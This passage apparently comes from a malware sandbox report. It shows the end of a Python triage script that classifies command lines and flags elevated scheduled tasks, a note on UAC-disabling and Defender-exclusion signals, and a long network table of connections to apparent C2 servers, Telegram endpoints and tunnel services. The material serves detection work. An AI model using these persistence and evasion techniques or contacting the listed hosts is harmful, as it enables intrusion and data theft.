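    return [tid for tid, _label, rx in RULES if rx.search(cmdline)]


def triage(cmdlines):
    """Group command lines by technique; lines matching nothing (chcp, ping
    localhost delays) are dropped as noise."""
    hits = {}
    for line in cmdlines:
        for tid in classify(line):
            hits.setdefault(tid, []).append(line)
    return hits


def task_details(cmdline):
    """For a task-creation line return name, target, run level and whether the
    target lives in a user-writable tree; None for any other line."""
    if not TASK_CREATE.search(cmdline):
        return None
    name = TASK_NAME.search(cmdline)
    target = TASK_TARGET.search(cmdline)
    return {
        "name": name.group(1) if name else None,
        "target": target.group(1) if target else None,
        "elevated": bool(ELEVATED.search(cmdline)),
        "user_writable_target": bool(target and USER_WRITABLE.search(target.group(1))),
    }


def download_urls(cmdlines):
    """URLs fetched with Invoke-WebRequest, for the network IOC list."""
    rx = RULES_BY_ID["T1105"]
    urls = []
    for line in cmdlines:
        m = rx.search(line)
        if m:
            urls.append(m.group(1))
    return urls


if __name__ == "__main__":
    for tid, lines in triage(SAMPLE_CMDLINES).items():
        print(f"{tid:10} {LABELS[tid]:50} {len(lines)} line(s)")
    for line in SAMPLE_CMDLINES:
        details = task_details(line)
        if details:
            print(details)
    print("downloads:", download_urls(SAMPLE_CMDLINES))
```

The user_writable_target flag is the check worth automating: every task this run registers with /rl HIGHEST or -RunLevel Highest points either at a binary under the user profile or, for the RuntimeBroker task, at a devtun subfolder of System32, which is not where the genuine RuntimeBroker.exe lives. Paired with the EnableLUA, ConsentPromptBehaviorAdmin and PromptOnSecureDesktop writes and the Add-MpPreference exclusions, that combination is the signal to alert on; the chcp 65001 and ping -n 10 localhost lines are the dropped batch scripts' own delays and match nothing by design.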

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.66.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 49.66.101.151.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 dev.cyberark-igiwax.com udp
US 44.243.209.238:80 dev.cyberark-igiwax.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 238.209.243.44.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 209.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
VN 14.243.221.170:2654 tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 alien-training.com udp
IE 52.218.61.44:80 alien-training.com tcp
US 20.83.148.22:8080 20.83.148.22 tcp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 192.168.2.15:443 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 44.61.218.52.in-addr.arpa udp
US 8.8.8.8:53 22.148.83.20.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 224.0.0.251:5353 udp
NL 149.154.167.220:443 api.telegram.org tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 exchange-reasonably.gl.at.ply.gg udp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:8777 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 rddissisifigifidi.net udp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 twizt.net udp
RU 185.215.113.66:80 twizt.net tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
BG 87.120.125.214:443 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
VN 14.243.221.170:2654 tcp
RU 185.215.113.66:80 twizt.net tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
RU 185.215.113.66:80 twizt.net tcp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
SE 193.233.255.106:69 tcp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
BG 87.120.125.214:443 tcp
RU 185.215.113.66:80 twizt.net tcp
NL 149.154.167.220:443 api.telegram.org tcp
BG 87.120.125.214:443 tcp
BG 87.120.125.214:443 tcp
US 8.8.8.8:53 www.grupodulcemar.pe udp
NL 149.154.167.220:443 api.telegram.org tcp
PE 161.132.57.101:80 www.grupodulcemar.pe tcp
RU 185.215.113.84:80 185.215.113.84 tcp
US 8.8.8.8:53 84.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 101.57.132.161.in-addr.arpa udp
US 8.8.8.8:53 millyscroqwp.shop udp
US 8.8.8.8:53 locatedblsoqp.shop udp
US 8.8.8.8:53 traineiwnqo.shop udp
US 8.8.8.8:53 condedqpwqm.shop udp
US 8.8.8.8:53 evoliutwoqm.shop udp
US 8.8.8.8:53 stagedchheiqwo.shop udp
US 8.8.8.8:53 stamppreewntnq.shop udp
US 8.8.8.8:53 caffegclasiqwp.shop udp
US 8.8.8.8:53 steamcommunity.com udp
RU 185.215.113.66:80 twizt.net tcp
GB 23.214.143.155:443 steamcommunity.com tcp
RU 176.113.115.163:80 176.113.115.163 tcp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 163.115.113.176.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
GB 20.26.156.215:443 github.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 192.210.150.26:8787 tcp
RU 185.215.113.66:80 twizt.net tcp
BG 87.120.125.214:443 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
VN 14.243.221.170:2654 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 23.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
RU 185.215.113.16:80 185.215.113.16 tcp
GB 23.214.143.155:443 steamcommunity.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
TM 91.202.233.141:80 91.202.233.141 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
RU 185.215.113.67:15206 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 141.233.202.91.in-addr.arpa udp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
SE 193.233.255.106:69 tcp
US 20.83.148.22:8080 20.83.148.22 tcp
DE 209.38.221.184:8080 209.38.221.184 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 21.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 184.221.38.209.in-addr.arpa udp
DE 46.235.26.83:8080 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 20.83.148.22:80 tcp
RU 185.215.113.117:80 tcp
US 192.210.150.26:8787 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 20.83.148.22:8080 20.83.148.22 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 tacitglibbr.biz udp
US 172.67.164.37:443 tacitglibbr.biz tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 immureprech.biz udp
US 104.21.22.222:443 immureprech.biz tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 37.164.67.172.in-addr.arpa udp
US 8.8.8.8:53 222.22.21.104.in-addr.arpa udp
US 8.8.8.8:53 deafeninggeh.biz udp
US 104.21.32.1:443 deafeninggeh.biz tcp
US 8.8.8.8:53 effecterectz.xyz udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 diffuculttan.xyz udp
US 8.8.8.8:53 debonairnukk.xyz udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 wrathful-jammy.cyou udp
US 172.67.206.53:443 wrathful-jammy.cyou tcp
US 8.8.8.8:53 1.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 53.206.67.172.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 awake-weaves.cyou udp
US 172.67.143.116:443 awake-weaves.cyou tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 sordid-snaked.cyou udp
US 8.8.8.8:53 116.143.67.172.in-addr.arpa udp
US 104.21.27.63:443 sordid-snaked.cyou tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
RU 185.215.113.67:21405 tcp
US 8.8.8.8:53 63.27.21.104.in-addr.arpa udp
US 8.8.8.8:53 www.update.microsoft.com udp
US 20.109.209.108:80 www.update.microsoft.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 108.209.109.20.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
PL 45.80.158.31:80 tcp
PL 45.80.158.31:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
IR 5.134.199.85:40500 udp
YE 94.26.219.44:40500 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 85.199.134.5.in-addr.arpa udp
US 192.210.150.26:8787 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 jirafasaltas.fun udp
US 104.21.57.227:443 jirafasaltas.fun tcp
US 8.8.8.8:53 227.57.21.104.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
MX 189.252.61.8:40500 udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 192.210.150.26:8787 tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 8.61.252.189.in-addr.arpa udp
VN 14.243.221.170:2654 tcp
US 8.8.8.8:53 cowod.hopto.org udp
US 20.83.148.22:80 tcp
DE 147.28.185.29:80 147.28.185.29 tcp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
US 192.210.150.26:8787 tcp
NL 206.166.251.4:8080 tcp
US 8.8.8.8:53 29.185.28.147.in-addr.arpa udp
KZ 92.47.52.79:40500 udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 79.52.47.92.in-addr.arpa udp
RU 185.215.113.67:15206 tcp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 twizthash.net udp
RU 185.215.113.66:5152 twizthash.net tcp
IR 2.177.40.206:40500 udp
SE 193.233.255.106:69 tcp
US 20.83.148.22:80 tcp
NL 149.154.167.99:443 t.me tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.123.95.227:443 steamcommunity.com tcp
US 20.83.148.22:80 tcp
FI 95.217.25.228:443 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 227.95.123.104.in-addr.arpa udp
PL 45.80.158.31:80 tcp
PL 45.80.158.31:80 tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
RU 45.150.24.42:40500 udp
US 8.8.8.8:53 42.24.150.45.in-addr.arpa udp
US 8.8.8.8:53 lsks.volamngayxua.net udp
VN 103.200.23.247:80 lsks.volamngayxua.net tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 247.23.200.103.in-addr.arpa udp
US 20.83.148.22:80 tcp
RU 185.215.113.67:21405 tcp
US 8.8.8.8:53 fivexc5pt.top udp
IR 5.239.109.92:40500 udp
US 192.210.150.26:8787 tcp
IR 2.191.61.218:40500 tcp
US 8.8.8.8:53 92.109.239.5.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.36:80 185.215.113.36 tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 36.113.215.185.in-addr.arpa udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
GB 38.180.203.11:1010 tcp
SY 82.137.239.235:40500 udp
US 8.8.8.8:53 235.239.137.82.in-addr.arpa udp
RU 185.215.113.36:80 185.215.113.36 tcp
VN 14.243.221.170:2654 tcp
FR 51.159.4.50:8080 51.159.4.50 tcp
US 8.8.8.8:53 fivexc5pt.top udp
NL 149.154.167.220:443 api.telegram.org tcp
US 20.83.148.22:80 tcp
SE 151.177.61.79:4782 tcp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 208.95.112.1:80 ip-api.com tcp
IR 217.171.148.45:40500 udp
US 8.8.8.8:53 45.148.171.217.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5pt.top udp
RU 185.215.113.67:15206 tcp
NL 149.154.167.99:443 t.me tcp
GB 104.123.95.227:443 steamcommunity.com tcp
KZ 92.46.40.130:40500 udp
FI 95.217.25.228:443 tcp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
N/A 192.168.190.133:4444 tcp
US 8.8.8.8:53 fivexc5pt.top udp
NL 62.60.217.159:15666 tcp
US 192.210.150.26:8787 tcp
IN 116.206.151.203:478 116.206.151.203 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
SE 193.233.255.106:69 tcp
KZ 213.211.105.70:40500 udp
US 8.8.8.8:53 203.151.206.116.in-addr.arpa udp
US 8.8.8.8:53 70.105.211.213.in-addr.arpa udp
PL 45.80.158.31:80 tcp
RU 185.215.113.66:80 twizthash.net tcp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
CN 183.57.21.131:8095 tcp
RU 185.215.113.67:21405 tcp
MX 189.136.17.247:40500 udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 247.17.136.189.in-addr.arpa udp
US 8.8.8.8:53 fivexc5pt.top udp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
IR 94.183.35.46:40500 tcp
US 20.83.148.22:80 tcp
IR 78.38.29.237:40500 udp
US 8.8.8.8:53 237.29.38.78.in-addr.arpa udp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
VN 14.243.221.170:2654 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5pt.top udp
GB 38.180.203.11:1010 tcp
RU 185.215.113.66:5152 twizthash.net tcp
SE 151.177.61.79:4782 tcp
US 8.8.8.8:53 www.pornhub.com udp
US 66.254.114.41:443 www.pornhub.com tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 static.trafficjunky.com udp
US 8.8.8.8:53 ei.phncdn.com udp
GB 64.210.156.23:443 ei.phncdn.com tcp
GB 64.210.156.23:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
US 20.83.148.22:80 tcp
US 206.217.142.166:1234 tcp
US 8.8.8.8:53 41.114.254.66.in-addr.arpa udp
US 8.8.8.8:53 23.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 17.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 media.trafficjunky.net udp
US 8.8.8.8:53 cdn1-smallimg.phncdn.com udp
US 66.254.114.156:443 cdn1-smallimg.phncdn.com tcp
GB 64.210.156.22:443 media.trafficjunky.net tcp
GB 64.210.156.17:443 media.trafficjunky.net tcp
US 8.8.8.8:53 156.114.254.66.in-addr.arpa udp
US 8.8.8.8:53 22.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 168.201.250.142.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 ss.phncdn.com udp
US 8.8.8.8:53 a.adtng.com udp
US 8.8.8.8:53 region1.google-analytics.com udp
US 192.210.150.26:8787 tcp
US 66.254.114.171:443 a.adtng.com tcp
US 66.254.114.171:443 a.adtng.com tcp
US 216.239.34.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 ht-cdn2.adtng.com udp
GB 64.210.156.16:443 ht-cdn2.adtng.com tcp
GB 64.210.156.16:443 ht-cdn2.adtng.com tcp
GB 64.210.156.16:443 ht-cdn2.adtng.com tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 hw-cdn2.adtng.com udp
GB 64.210.156.0:443 hw-cdn2.adtng.com tcp
YE 134.35.128.189:40500 udp
US 8.8.8.8:53 171.114.254.66.in-addr.arpa udp
US 8.8.8.8:53 36.34.239.216.in-addr.arpa udp
US 8.8.8.8:53 16.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 0.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 189.128.35.134.in-addr.arpa udp
US 8.8.8.8:53 storage.googleapis.com udp
FR 142.250.74.251:443 storage.googleapis.com tcp
US 8.8.8.8:53 251.74.250.142.in-addr.arpa udp
NL 149.154.167.99:443 t.me tcp
GB 104.123.95.227:443 steamcommunity.com tcp
FI 95.217.25.228:443 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:15206 tcp
US 216.239.34.36:443 region1.google-analytics.com udp
KZ 95.59.234.182:40500 udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 182.234.59.95.in-addr.arpa udp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 8.8.8.8:53 safe.ywxww.net udp
IR 95.81.102.72:40500 udp
US 8.8.8.8:53 72.102.81.95.in-addr.arpa udp
CN 60.191.236.246:820 safe.ywxww.net tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 192.210.150.26:8787 tcp
PL 45.80.158.31:80 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
UZ 90.156.164.103:40500 udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 103.164.156.90.in-addr.arpa udp
SE 193.233.255.106:69 tcp
RU 185.215.113.67:21405 tcp
PK 182.188.65.58:40500 tcp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5pt.top udp
MX 189.141.139.39:40500 udp
US 8.8.8.8:53 39.139.141.189.in-addr.arpa udp
VN 14.243.221.170:2654 tcp
SE 151.177.61.79:4782 tcp
US 20.83.148.22:80 tcp
GB 38.180.203.11:1010 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 192.210.150.26:8787 tcp
NL 149.154.167.99:443 t.me tcp
US 20.83.148.22:80 tcp
UZ 90.156.160.56:40500 udp
US 8.8.8.8:53 56.160.156.90.in-addr.arpa udp
US 8.8.8.8:53 fivexc5pt.top udp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
UZ 92.38.19.10:40500 udp
US 8.8.8.8:53 10.19.38.92.in-addr.arpa udp
RU 185.215.113.67:15206 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 t.0000o.xyz udp
US 199.195.251.23:88 t.0000o.xyz tcp
US 8.8.8.8:53 23.251.195.199.in-addr.arpa udp
US 8.8.8.8:53 aefieiaehfiaehr.top udp
RU 185.215.113.66:80 aefieiaehfiaehr.top tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
SE 151.177.61.79:4782 tcp
VN 14.243.221.170:2654 tcp
SY 82.137.239.235:40500 tcp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
AO 102.215.170.62:40500 udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 8.8.8.8:53 62.170.215.102.in-addr.arpa udp
TR 163.5.242.208:80 163.5.242.208 tcp
GB 38.180.203.11:1010 tcp
RU 185.215.113.67:21405 tcp
US 192.210.150.26:8787 tcp
SE 193.233.255.106:69 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
UZ 213.230.99.119:40500 udp
US 8.8.8.8:53 fivexc5pt.top udp
PL 45.80.158.31:80 tcp
RU 188.119.66.185:443 tcp
US 8.8.8.8:53 208.242.5.163.in-addr.arpa udp
US 8.8.8.8:53 119.99.230.213.in-addr.arpa udp
US 8.8.8.8:53 185.66.119.188.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 fivexc5sr.top udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
IR 185.80.102.252:40500 udp
NL 31.214.157.206:2024 tcp
US 8.8.8.8:53 252.102.80.185.in-addr.arpa udp
US 8.8.8.8:53 206.157.214.31.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5sr.top udp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
AO 154.71.224.9:40500 udp
RU 185.215.113.67:15206 tcp
US 8.8.8.8:53 9.224.71.154.in-addr.arpa udp
US 8.8.8.8:53 fivexc5pt.top udp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5sr.top udp
US 20.83.148.22:80 tcp
IR 93.118.127.143:40500 udp
VN 14.243.221.170:2654 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 143.127.118.93.in-addr.arpa udp
US 8.8.8.8:53 fivexc5pt.top udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5sr.top udp
US 192.210.150.26:8787 tcp
RU 31.8.228.20:40500 udp
US 8.8.8.8:53 20.228.8.31.in-addr.arpa udp
US 8.8.8.8:53 fivexc5pt.top udp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
SE 151.177.61.79:4782 tcp
IR 2.176.92.74:40500 tcp
IR 2.179.117.33:40500 udp
US 8.8.8.8:53 fivexc5sr.top udp
SE 193.233.255.106:69 tcp
US 8.8.8.8:53 33.117.179.2.in-addr.arpa udp
US 8.8.8.8:53 aquafusion.com.co udp
CO 190.90.160.170:443 aquafusion.com.co tcp
RU 185.215.113.67:21405 tcp
NL 149.154.167.99:443 t.me tcp
GB 104.123.95.227:443 steamcommunity.com tcp
PL 45.80.158.31:80 tcp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5pt.top udp
FI 95.217.25.228:443 tcp
TR 163.5.242.208:80 163.5.242.208 tcp
TR 163.5.242.208:80 163.5.242.208 tcp
UZ 62.209.135.143:40500 udp
US 20.83.148.22:80 tcp
GB 38.180.203.11:1010 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 143.135.209.62.in-addr.arpa udp
US 8.8.8.8:53 fivexc5sr.top udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
RU 212.3.146.135:40500 udp
US 8.8.8.8:53 fivexc5sr.top udp
US 8.8.8.8:53 135.146.3.212.in-addr.arpa udp
RU 185.215.113.67:15206 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 fivexc5pt.top udp
VN 14.243.221.170:2654 tcp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5sr.top udp
IN 59.91.192.115:40500 udp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 8.8.8.8:53 115.192.91.59.in-addr.arpa udp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5sr.top udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 20.83.148.22:80 tcp
RU 31.41.244.12:80 31.41.244.12 tcp
NL 62.60.217.159:15666 tcp
SE 151.177.61.79:4782 tcp
US 8.8.8.8:53 12.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 fivexc5pt.top udp
NL 149.154.167.99:443 t.me tcp
US 192.210.150.26:8787 tcp
KZ 31.171.187.236:40500 udp
GB 104.123.95.227:443 steamcommunity.com tcp
FI 95.217.25.228:443 tcp
US 8.8.8.8:53 236.187.171.31.in-addr.arpa udp
YE 46.35.80.190:40500 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:21405 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 fivexc5sr.top udp
PL 45.80.158.31:80 tcp
BG 87.120.125.214:443 tcp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
IR 2.189.31.47:40500 udp
GB 38.180.203.11:1010 tcp
US 8.8.8.8:53 47.31.189.2.in-addr.arpa udp
SE 193.233.255.106:69 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.66:80 aefieiaehfiaehr.top tcp
BG 87.120.125.214:443 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5pt.top udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 fivexc5sr.top udp
KZ 82.200.228.118:40500 udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 aeufoeahfouefhg.top udp
US 8.8.8.8:53 118.228.200.82.in-addr.arpa udp
US 147.185.221.23:1121 tcp
RU 185.215.113.66:80 aeufoeahfouefhg.top tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 racedsuitreow.shop udp
US 8.8.8.8:53 pirati.privatedns.org udp
US 8.8.8.8:53 defenddsouneuw.shop udp
IT 87.6.220.118:80 pirati.privatedns.org tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 8.8.8.8:53 deallyharvenw.shop udp
US 8.8.8.8:53 priooozekw.shop udp
US 8.8.8.8:53 22.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 pumpkinkwquo.shop udp
US 8.8.8.8:53 abortinoiwiam.shop udp
RU 185.215.113.67:15206 tcp
US 8.8.8.8:53 surroundeocw.shop udp
US 8.8.8.8:53 118.220.6.87.in-addr.arpa udp
US 8.8.8.8:53 covvercilverow.shop udp
VN 14.243.221.170:2654 tcp
US 8.8.8.8:53 steamcommunity.com udp
FR 23.217.238.254:443 steamcommunity.com tcp
US 8.8.8.8:53 254.238.217.23.in-addr.arpa udp
UZ 90.156.160.66:40500 udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 66.160.156.90.in-addr.arpa udp
US 8.8.8.8:53 fivexc5sr.top udp
US 20.83.148.22:80 tcp
BG 87.120.125.214:443 tcp
RU 188.119.66.185:443 tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
NL 31.214.157.206:2024 tcp
US 8.8.8.8:53 30.31.192.18.in-addr.arpa udp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5pt.top udp
